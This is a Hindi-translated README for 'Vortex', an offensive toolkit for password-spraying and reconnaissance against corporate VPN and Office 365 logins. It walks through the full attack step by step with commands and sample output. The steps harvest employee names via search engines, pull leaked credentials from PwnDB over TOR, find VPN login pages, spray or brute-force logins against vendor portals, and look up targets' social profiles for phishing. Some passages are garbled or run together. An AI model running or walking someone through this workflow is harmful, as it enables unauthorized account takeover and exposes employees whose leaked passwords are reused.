
VPN समग्र टोही, परीक्षण, गणना और शोषण टूलकिट
🚩 यह vortex का सार्वजनिक रिपॉजिटरी है, नवीनतम संस्करण और अपडेट के लिए कृपया हमें https://porchetta.industries/ के माध्यम से समर्थन करने पर विचार करें
VPN समग्री पुनर्ज्ञान, परीक्षण, गणना और शोषण टूलकिट
यदि आप इस प्रोजेक्ट को प्रायोजित करना चाहते हैं और vortex पर नवीनतम अपडेट, नवीनतम सुधार, नवीनतम सुविधाएँ प्राप्त करना चाहते हैं, तो कृपया हमें https://porchetta.industries/ पर समर्थन करें
डिस्कॉर्ड पर आएं और बातचीत करें!
एक बहुत ही सरल Python फ्रेमवर्क, [SprayingToolkit][1] से प्रेरित, जो सामान्य O365 और VPN एंडपॉइंट (जैसे Cisco, Citrix, Fortinet, Pulse, आदि) का पता लगाने, गणना करने और हमला करने के लिए आवश्यक अधिकांश प्रक्रिया को स्वचालित करने का प्रयास करता है।
VPN स्प्रेइंग चरण को बहुत तेज और आसान बनाने के लिए। साथ ही, इसकी लचीलापन के कारण, इस टूल को आसानी से मौजूदा OSINT वर्कफ़्लो में जोड़ा जा सकता है।
Vortex मुख्य रूप से निम्नलिखित कार्यों को करने में सहायता प्रदान करता है:
pip3 के साथ पूर्वापेक्षाएँ इस प्रकार स्थापित करें:``` sudo -H pip3 install -r requirements.txt
### Virtualenv के साथ इंस्टॉल करें
अन्यथा, आप वर्चुअल एनवायरनमेंट का उपयोग करके पूर्वापेक्षाएँ स्थापित कर सकते हैं:
###### विंडोज़ पर```
virtualenv venv
venv\Scripts\activate
pip install -r requirements.txt
python3 -m virtualenv venv source venv/bin/activate pip install -r requirements.txt
## उपयोग
टूल का उपयोग करना काफी सीधा है, लेकिन एक कार्यप्रवाह का पालन करना होता है। टूल वर्तमान आक्रमण के बारे में जानकारी संग्रहीत करने के लिए SQLite डेटाबेस का उपयोग करता है।
### कार्यक्षेत्र
कार्यक्षेत्र टूल द्वारा उपयोग की जाने वाली डेटाबेस फ़ाइल का प्रतिनिधित्व करता है। नाम वर्तमान आक्रमण, प्रोजेक्ट या लक्ष्य को लेबल करने के लिए एक सरल नाम होना चाहिए।
प्रत्येक कार्यक्षेत्र को एक SQLite डेटाबेस निर्दिष्ट किया जाता है। जब आप एक कार्यक्षेत्र नाम निर्दिष्ट करते हैं, जैसे:
workspace_name
python manage.py -w workspace1
```
आप वास्तव में कह रहे हैं "मैं `workspace1.db` फ़ाइल पर कार्य करना चाहता हूँ"।
#### कार्यक्षेत्र आरंभीकरण
ठीक से काम करने के लिए, Vortex को DB को सही स्कीमा के साथ आरंभीकृत करना होगा।
ऐसा करने के लिए, बस कमांड निष्पादित करना है:```
python manage.py -w workspace1 db -c init
```
यदि कोई उपयोगकर्ता इस चरण को छोड़ने का प्रयास करता है, तो Vortex पहले लॉन्च करने के लिए सही कमांड को स्क्रीन पर प्रिंट करेगा।```
[-] Workspace not initialized. Please initialise it using:
python manage.py -w workspace1 db -c init
```
इसके बजाय, जब किसी मौजूदा, प्रारंभित DB के विरुद्ध वही कमांड चलाया जाता है, तो Vortex DB फ़ाइल को ओवरराइट करने से पहले पुष्टि मांगेगा:```
[-] The DB file exists and it was initialised, overwrite?
[y|n] $> y
```
### क्रियाएँ और कमांड
Vortex एक positional argument, 'Action', और अन्य keyed values के साथ काम करता है।
इनमें से सबसे महत्वपूर्ण है command argument (`-c cmd`)। action value के साथ मिलकर,
command परिभाषित करता है कि Vortex को क्या करना चाहिए।
समर्थित actions की सूची Help से देखी जा सकती है:```
python manage.py -h
Vortex: VPN Overall Reconnaissance, Enumeration and eXploitation
positional arguments:
{db,domain,import,office,profile,search,tor,validate,vpn}
Action to execute
optional arguments:
-h, --help show this help message and exit
-w WORKSPACE, --workspace WORKSPACE
Workspace to use
-c COMMAND, --command COMMAND
Command for the action
-D DOMAIN, --domain DOMAIN
Domain under attack
-C COMPANY, --company COMPANY
Company under attack
-l LOCATION, --location LOCATION
Location of the company under attack (IE, UK, US, ...)
-u URL, --url URL VPN Endpoint Origin (schema://domain:port)
-t ENDPOINT_TYPE, --endpoint-type ENDPOINT_TYPE
Target Endpoint Type
-U USER, --user USER User name
-E EMAIL, --email EMAIL
User email
-N NAME, --name NAME User full name
-R ROLE, --role ROLE User job
-s SQL, --sql SQL SQL statement
-O EXPORT_FILE, --export-file EXPORT_FILE
Export file
-Q QUOTES, --quotes QUOTES
Produce an Excel safe CSV
-nh, --no-headers Remove CSV headers
-k KEYWORDS, --keywords KEYWORDS
Search keywords
-P PASSWORDS_FILE, --passwords-file PASSWORDS_FILE
Password file for spraying
-L, --leaks Use leaks for spraying
-I IMPORT_FILE, --import-file IMPORT_FILE
Import file
```
#### गतिशील तर्क इनपुटिंग
जैसा कि सहायता से देखा जा सकता है, प्रति क्रिया समर्थित कमांड की सूची कहीं भी निर्दिष्ट नहीं है। ऐसा इसलिए है क्योंकि सीधे कमांड निर्दिष्ट करना आवश्यक नहीं है। वास्तव में, यदि कोई कमांड निर्दिष्ट नहीं है, तो Vortex उपयोगकर्ता से निर्दिष्ट क्रिया के लिए उपलब्ध कमांडों में से एक का चयन करने के लिए कहेगा।```
python manage.py -w workspace1 db
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Select a command:
0 : init
1 : sql
2 : add-endpoint
3 : add-user
4 : drop-user
5 : truncate-table
6 : export
$>
```
यही बात किसी विशेष रूटीन के लिए आवश्यक तर्क पर भी लागू होती है। यदि कोई तर्क रनटाइम पर इनपुट करना कठिन है, तो Vortex उपयोगकर्ता को दयालुतापूर्वक याद दिलाएगा कि पैरामीटर आवश्यक है। अन्यथा, Vortex उपयोगकर्ता को आवश्यक तर्कों का चयन या इनपुट करने में मार्गदर्शन करेगा।
उदाहरण के लिए, यदि कोई उपयोगकर्ता किसी विशिष्ट तालिका या यहां तक कि कॉलम को निर्यात करना चाहता है, तो केवल आवश्यक कार्य निर्यात कमांड लॉन्च करना होगा, जैसा कि नीचे दिए गए चित्र में देखा जा सकता है:

इस प्रकार का व्यवहार Vortex को उपयोग करने में वास्तव में आसान बनाता है।
### सामान्य कार्यप्रवाह
Vortex को एक विशिष्ट संचालन कार्यप्रवाह का पालन करने के लिए डिज़ाइन किया गया है, जिसे नीचे दिए गए स्कीमा में संक्षेपित किया गया है:

### संचालन
#### उपयोगकर्ता एकत्र करना
किसी विशिष्ट लक्ष्य के लिए मान्य उपयोगकर्ताओं को एकत्र करना तीन अलग-अलग स्रोतों का उपयोग करके किया जा सकता है:
* LinkedIn
यह स्रोत LinkedIn उपयोगकर्ता नीतियों के उल्लंघन के कारण हटा दिया गया है।
आप अभी भी [GoMapEnum](https://github.com/nodauf/GoMapEnum) का उपयोग करके LinkedIn पर काम कर सकते हैं,
और फिर `import` कमांड का उपयोग करके ईमेल पतों को आयात कर सकते हैं।
फिर से, कृपया ध्यान रखें कि इस कार्यक्षमता का उपयोग LinkedIn उपयोगकर्ता समझौते का उल्लंघन है, जैसा कि LinkedIn उपयोगकर्ता समझौते के बिंदु [8.2](https://www.linkedin.com/legal/user-agreement#dos) पर देखा जा सकता है:
> आप सहमत हैं कि आप नहीं करेंगे: [...]
> 2. सेवाओं से डेटा स्क्रैप करने या प्रोफाइल और अन्य डेटा कॉपी करने के लिए सॉफ्टवेयर, उपकरणों, स्क्रिप्ट्स, रोबोट या किसी अन्य माध्यम या प्रक्रिया (क्रॉलर, ब्राउज़र प्लगइन्स और ऐड-ऑन या किसी अन्य तकनीक सहित) का विकास, समर्थन या उपयोग करना;
* CrossLinked
उपरोक्त कार्यक्षमता को आंशिक रूप से बदलने के लिए, उपकरण [CrossLinked](https://github.com/m8r0wn/CrossLinked) का एक अनुकूलित संस्करण एम्बेड करता है। यह उपकरण Google और Bing का उपयोग करके किसी कंपनी के कर्मचारियों का पता लगाने का प्रयास करेगा। यह निश्चित रूप से LinkedIn पर सीधे खोज करने जैसा नहीं है, लेकिन यह काफी उपयोगी है।
सही ढंग से संचालित करने के लिए, उपकरण उपयोगकर्ता से पूछेगा कि उपयोगकर्ता नामों के लिए किस प्रारूप का उपयोग किया जाना चाहिए (जैसे john.doe, j.doe या d.john) और लक्ष्य डोमेन द्वारा उपयोग किया जाने वाला मानक डोमेन कौन सा है।```
python manage.py -w workspace1 search -c crosslinked -D evilcorp.com -C "Evil Corporation"
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[+] Select a format for usernames
0: firstlast
1: lastfirst
2: first.last
3: last.first
4: last.f
5: flast
6: lfirst
7: f.last
8: l.first
9: first
10: last
$> 2
[*] Starting search on Google and Bing with CrossLinked
[>] Searching google for valid employee names at "Evil Corporation"
[>] Searching bing for valid employee names at "Evil Corporation"
[>] Found 133 LinkedIn accounts!
[*] Updating DB ...
[+] Done!
```
* Google
यह स्रोत [theHarvester]() के एक छीने गए, संशोधित संस्करण का उपयोग करके संचालित होता है।
यह उपकरण Google Dorks का उपयोग करके Google से नाम/ईमेल निकालने का प्रयास करेगा (Passive Gathering), और कंपनी की वेबसाइट से (Active Gathering)।```
python manage.py -w workspace1 search -c google -D evilcorp.com
[*] Starting passive/active search on Google
[*] (PASSIVE) Searching for emails NOT within the domain's site: evilcorp.com -site:evilcorp.com
[*] (ACTIVE) Searching for emails within the domain's sites: evilcorp.com
[+] Scraping any emails from: https://evilcorp.com
[+] Scraping any emails from: https://www.facebook.com/EvilCorp/
...
[+] 2 unique emails found:
---------------------------
[email protected]
[email protected]
[>] Found 2 mail
[*] Updating DB ...
[+] Done!
```
* PwnDB
यह स्रोत [sn0int](https://github.com/kpcyrd/sn0int) में कार्यान्वित एक के पोर्टेड संस्करण का उपयोग करके संचालित होता है।
**नोट**: इस कार्यक्षमता के लिए TOR नेटवर्क से जुड़े होना आवश्यक है। Windows पर, Vortex के साथ प्रदान किए गए एम्बेडेड संस्करण का उपयोग करना संभव है। Linux पर, इसके बजाय, tor पैकेज (जैसे Kali पर `sudo apt-get install tor`) स्थापित करना आवश्यक है।
##### TOR प्रारंभ करें```
python manage.py -w workspace1 tor -c start
[*] Starting TOR Browser, click on connect
```
##### PwnDB पर पर गणना करें```
python manage.py -w workspace1 search -c pwndb -D evilcorp.com
[*] Starting search on PwnDB
[>] Found 493 leaked accounts!
[*] Updating DB ...
[+] Done!
```
##### रोकें TOR```
python manage.py -w workspace1 tor -c stop
[*] Stopping TOR browser
```
#### एंडपॉइंट एकत्रित करें
Vortex मुख्य रूप से एंडपॉइंट के लिए दो मैक्रो-श्रेणियों का उपयोग करता है: VPN और Microsoft (Office) एंडपॉइंट।
किसी लक्ष्य को Office या VPN एंडपॉइंट के रूप में जोड़ा जा सकता है, और Vortex विभिन्न वैलिडेटर्स का उपयोग करके एंडपॉइंट को क्रमशः Office या VPN एंडपॉइंट के रूप में मान्य करने का प्रयास करेगा।
##### एक office एंडपॉइंट जोड़ें
आइए इसे एक उदाहरण से स्पष्ट करते हैं। उपयोगकर्ता को लक्ष्य `evilcorp.com` पर हमला करने की आवश्यकता है, और यह जांचना चाहता है कि डोमेन OWA, Lync, ADFS, या O365 लक्ष्य है या नहीं।```
python manage.py -w workspace1 office -c add -D evilcorp.com
[#] OWA domain appears to be hosted internally
[+] evilcorp.com is a valid OWA target!
[-] evilcorp.com does not seem a valid LYNK target
[-] evilcorp.com does not seem a valid ADFS target
[-] evilcorp.com does not seem a valid IMAP target
[+] evilcorp.com is a valid O365 target!
```
##### VPN एंडपॉइंट्स के लिए सबडोमेन खोजें
VPN एंडपॉइंट्स के लिए, उपयोगकर्ता VPN वेब लॉगिन चलाने वाले होस्ट ढूंढने के लिए सबडोमेन खोज कर सकता है,
जैसे:```
python manage.py -w workspace1 domain -c enum -D evilcorp.com
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Starting subdomain passive enumeration
[>] Found 10 subdomains
[$] Elapsed time: 18.360117197036743
[*] Enumerating potential VPN endpoints (HTTPS on 443, 10443)
[>] Found 1 hosts running an SSL webserver
[$] Elapsed time: 18.916626691818237
[*] Trying to detect hosts with VPN web-login
[>] Found 1 hosts with a VPN web login
[$] Elapsed time: 32.919618368148804
[*] Updating DB...
[+] Adding vpn.evilcorp.com:443 as a pulse target
[>] Elapsed time: 18.920615434646606
[+] Done
```
##### VPN एंडपॉइंट मैन्युअल रूप से जोड़ें
VPN एंडपॉइंट को मैन्युअल रूप से जोड़ने के लिए, निश्चित रूप से, शीर्ष स्तरीय डोमेन निर्दिष्ट करना शायद पर्याप्त नहीं होगा।
सही तरीका यह होगा कि एक विशिष्ट उपडोमेन के साथ-साथ वह विशिष्ट पोर्ट भी निर्दिष्ट किया जाए जिस पर VPN वेब सर्वर है
चल रहा है।```
python manage.py -w workspace1 vpn -c add -D vpn.evilcorp.com:443
[+] vpn.evilcorp.com:443 is a pulse target!
```
#### OWA, ADFS, LYNC, या O365 के विरुद्ध पासवर्ड स्प्रे या ब्रूटफोर्स हमला करें
पासवर्ड स्प्रे या ब्रूटफोर्स हमला करने के लिए, एकमात्र आवश्यक
संसाधन एक पासवर्ड सूची है जो एक टेक्स्ट फ़ाइल के रूप में होती है, जिसमें प्रति पंक्ति एक पासवर्ड
होता है।```
python manage.py -w workspace1 office -c attack -P passwords.txt
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : owa
1 : lync
2 : imap
3 : adfs
4 : o365
5 : all
$> 4
[*] Running O365Enumerator
[-] [email protected]:MrRobot2021! is not valid.
[+] [email protected]:Joanna2021! is valid!
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
```
#### VPN एंडपॉइंट के विरुद्ध पासवर्ड स्प्रे या ब्रूटफोर्स हमला करें
पासवर्ड स्प्रे या ब्रूटफोर्स हमला करने के लिए, एकमात्र आवश्यक संसाधन एक पासवर्ड सूची है जो टेक्स्ट फ़ाइल के रूप में हो, जिसमें प्रति पंक्ति एक पासवर्ड हो।```
python manage.py -w workspace1 vpn -c attack -P passwords.txt
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[-] [email protected]:MrRobot2021! is not valid.
[+] [email protected]:Joanna2021! is valid!
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
```
#### लीक हुए क्रेडेंशियल्स का उपयोग करके पासवर्ड स्प्रे या ब्रूटफ़ोर्स करें
चूंकि Vortex PwnDB पर लीक हुए क्रेडेंशियल्स पर नज़र रखता है, उपयोगकर्ता पासवर्ड फ़ाइल प्रदान करने के बजाय सभी लीक हुए क्रेडेंशियल्स का परीक्षण करने का चयन कर सकता है।
हालाँकि, यह व्यवहार सामान्य पासवर्ड स्प्रे से काफी अलग है। सामान्य पासवर्ड स्प्रे हमले में, वास्तव में, एक ही पासवर्ड सभी उपयोगकर्ताओं के विरुद्ध आज़माया जाता है। लीक हुए क्रेडेंशियल्स के हमले में, लीक हुए क्रेडेंशियल्स का परीक्षण उस विशिष्ट उपयोगकर्ता के विरुद्ध किया जाता है जिसके साथ वे लीक हुए थे। इसलिए, उदाहरण के लिए, यदि Vortex को ये लीक मिले:```
User Leaks
---------------------------- ----------------------------
[email protected] ["ISecretlyLoveAngela2020!"]
[email protected] ["Puppy19!", "MySweetJ111!"]
```
Vortex निम्नलिखित प्रयासों को संचालित करेगा, और केवल निम्नलिखित:```
[email protected]:ISecretlyLoveAngela2020!
[email protected]:Puppy19!
[email protected]:MySweetJ111!
```
इस हमले को करने के लिए, किसी पासवर्ड फ़ाइल की आवश्यकता नहीं है, लेकिन
(-L, या --leaks) पैरामीटर सेट करना आवश्यक है।```
python manage.py -w workspace1 vpn -c attack -L
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[+] [email protected]:ISecretlyLoveAngela2020! is valid!
[-] [email protected]:Puppy19! is not valid.
[-] [email protected]:MySweetJ111! is not valid.
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
```
यह काफी हद तक सब कुछ है। कभी-कभी उपकरण किसी हमले को करने से पहले अधिक जानकारी मांग सकता है, जैसे कि VPN realm/group का चयन करना।
##### परिणाम दिखाना
किसी भी समय, आप निम्नलिखित कमांड का उपयोग करके पाए गए वैध लॉगिन देख सकते हैं:
```
crackmapexec -u users.txt -p passwords.txt --continue-on-success
python manage.py db -w workspace1 -c found-logins [+] Valid Logins Collected: ID Target E-Mail Password
1 vpn.evilcorp.com:443 [email protected] Joanna2021! 2 vpn.evilcorp.com:443 [email protected] ISecretlyLoveAngela2020! [+] Done
#### सोशल नेटवर्क प्रोफाइल खोजना
कभी-कभी, बड़े अभियानों में, अपने लक्ष्यों के बारे में थोड़ा और जानने से हमें उनकी सुरक्षा में सेंध लगाने में मदद मिलती है, जैसे कि फ़िशिंग के लिए व्यक्तिगत ईमेल या सोशल अकाउंट का उपयोग करना, या पासवर्ड रीसेट सुरक्षा प्रश्नों के उत्तर खोजना)।
इस कारण से, मैंने [Profil3r](https://github.com/Greyjedix/Profil3r) को एकीकृत किया है। यह उपकरण किसी व्यक्ति से संभावित रूप से संबंधित सोशल नेटवर्क अकाउंट की पहचान करने का प्रयास करता है।
**महत्वपूर्ण नोट**: Profil3r नाम मैशिंग का उपयोग करके वैध प्रोफाइल का पता लगाने का प्रयास करता है। यह गारंटी नहीं दे सकता कि मिली प्रोफाइल वास्तव में लक्ष्य व्यक्ति से संबंधित हैं। इस कारण से, प्रोफाइल स्वचालित रूप से Vortex DB में नहीं जोड़ी जाती हैं।
वर्तमान में, Profil3r के साथ दो मोड में काम करना संभव है:
* सिंगल-मोड
* मल्टी-मोड
सिंगल-मोड उपयोगकर्ता द्वारा प्रदान किए गए कीवर्ड के सेट पर काम करता है:```
python manage.py -w workspace1 profile -c single -k elliot -k alderson
,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F
[*] Starting single profile search
...
└── FACEBOOK ✔️
├──https://facebook.com/elliot
├──https://facebook.com/alderson
├──https://facebook.com/elliotalderson
├──https://facebook.com/aldersonelliot
├──https://facebook.com/elliot.alderson
├──https://facebook.com/alderson.elliot
...
[+] Done!
The multi-mode operates on first and last name of each user in the DB. Any additional keyword passed in multi-mode is used in combination with users' first and last name. So, as example, you can use additional names or numbers to customise the profile search.``` python manage.py -w workspace1 profile -c multi -k 90
,d#####F^ ,yy############yy ^9#######, ,######" y###################by ^9######, ######^ y#####F"" ^"9######y "######] d#####^ ,#####" by klezVirus ^9#####, ^######, ,#####] ,####F yy#######y, ^9####b ^###### [##### ####F ,###F""'"9####, 9####] 9##### #####F [#### ,##F^ yy "###b 9####, ^#####] #####] [###] ### dF""#b ^###] ^####] #####] 9####b [#### 9##, 9bd [#] [##b ##### [##### [##### ####, 9##y, ,y##^ d##F ##### [####] #####b ^####y ^"#####" d###^ ,####] d##### [#####, ^####by ,d###^ d####^ #####F 9#####y "#####byyyyyyd####F^ d####F [#####9 9#####b, ""############"^ ,d####F ,###### ^######b, ""'""'"^ ,d#####F d#####F
[*] Starting per-user profile search [>] Searching profiles for Elliot Alderson. Additional keywords: 90 ... └── TWITTER ✔️ ├──https://twitter.com/ElliotAlderson ├──https://twitter.com/AldersonElliot ├──https://twitter.com/Elliot90 ├──https://twitter.com/90Elliot ├──https://twitter.com/Alderson90 ... [>] Searching profiles for Tom Wellick. Additional keywords: 90 ... └── TWITTER ✔️ ├──https://twitter.com/Tom ├──https://twitter.com/Wellick ├──https://twitter.com/90 ├──https://twitter.com/Tom90 ├──https://twitter.com/90Tom ... [+] Done!
#### बाहरी डेटा आयात करना
वोर्टेक्स उपयोगकर्ताओं या एंडपॉइंट्स से संबंधित बाहरी डेटा आयात करने का समर्थन भी प्रदान करता है।
वर्तमान में, केवल सादे पाठ फ़ाइलें समर्थित हैं और CSV के लिए सीमित समर्थन भी है।
अब तक आयात किए जा सकने वाले डेटा प्रकार हैं:
* ई-मेल पते
* उपयोगकर्ता नाम
* वीपीएन एंडपॉइंट (लक्ष्य:पोर्ट)
* डोमेन
* ~~PwnDB से लीक~~ अब अप्रचलित: बस सर्च कमांड का उपयोग करें
* ~~Blues~~ के साथ निकाला गया LinkedIn डेटा
प्रत्येक डेटा-प्रकार सामान्य पाठ-फ़ाइल प्रारूप में समर्थित है, प्रति पंक्ति एक तत्व।
## रोडमैप
नई कार्यक्षमताएं जल्द ही आ रही हैं (2022):
* स्मार्ट पासवर्ड सूची निर्माण
* डेटा निष्कर्षण और सहसंबंध
कृपया बग, सुझाव या फीचर अनुरोध सबमिट करें।
## श्रेय
* [byt3bl33d3r](https://twitter.com/byt3bl33d3r): [SprayingToolkit][1] पर उनके अद्भुत कार्य के लिए, जिसने परियोजना को प्रेरित किया
* [nodauf](https://twitter.com/nodauf): [GoMapEnum](https://github.com/nodauf/GoMapEnum) पर उनके कार्य के लिए, जिसने मुझे अन्य विचार दिए
* [quasart](https://github.com/quasart): लोगो [spiral](https://github.com/quasart/spiral) के साथ उत्पन्न किया गया था
* [m8r0wn](https://twitter.com/m8r0wn): [CrossLinked](https://github.com/m8r0wn/CrossLinked) पर उनके कार्य के लिए, जो वास्तव में एक शानदार उपकरण है
* [Greyjedix](https://github.com/Greyjedix/): [Profil3r](https://github.com/Greyjedix/Profil3r) पर उनके कार्य के लिए, जो कुछ परिस्थितियों में बहुत उपयोगी उपकरण है
[1]: https://github.com/byt3bl33d3r/SprayingToolkit